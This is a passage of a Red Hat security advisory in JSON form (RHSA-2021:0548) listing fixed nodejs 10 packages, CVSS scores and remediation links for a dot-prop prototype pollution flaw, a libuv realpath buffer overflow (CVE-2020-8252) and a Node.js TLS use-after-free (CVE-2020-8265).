"AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-docs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0548" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "products": [ "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-docs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs-dot-prop: prototype pollution" }, { "cve": "CVE-2020-8252", "cwe": { "id": "CWE-122", "name": "Heap-based Buffer Overflow" }, "discovery_date": "2020-09-16T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1879315" } ], "notes": [ { "category": "description", "text": "A flaw has been found in libuv. The realpath() implementation performs an incorrect calculation when allocating a buffer, leading to a potential buffer overflow. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "libuv: buffer overflow in realpath", "title": "Vulnerability summary" }, { "category": "other", "text": "As shipped in Red Hat Software Collections (nodejs-10 \u0026 nodejs-12) as well as Red Hat Enterprise Linux 8 (nodejs-10 and nodejs-12), no incorrect use of the `UV__PATH_MAX` macro were found. Although the releases of libuv contained in these versions of nodejs are considered \"Affected\", it is considered not feasible to trigger the flaw.\n\nNodeJS is included in Red Hat Quay as a dependency of Yarn which is only used while building Red Hat Quay, and not during runtime.\n\nRed Hat Enterprise Linux 8 ships libuv-1.23.1, which is not vulnerable to this flaw.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-docs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-8252" }, { "category": "external", "summary": "RHBZ#1879315", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1879315" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-8252", "url": "https://www.cve.org/CVERecord?id=CVE-2020-8252" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-8252", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8252" } ], "release_date": "2020-09-15T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-16T14:25:46+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-docs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0548" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-docs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "libuv: buffer overflow in realpath" }, { "cve": "CVE-2020-8265", "cwe": { "id": "CWE-416", "name": "Use After Free" }, "discovery_date": "2021-01-05T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1912854" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs. When writing to a TLS enabled socket, node::StreamBase::Write calls node::TLSWrap::DoWrite with a freshly allocated WriteWrap object as first argument. If the DoWrite method does not return an error, this object is passed back to the caller as part of a StreamWriteResult structure. This may be exploited to corrupt memory leading to a Denial of Service or potentially other exploits.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs: use-after-free in the TLS implementation", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", 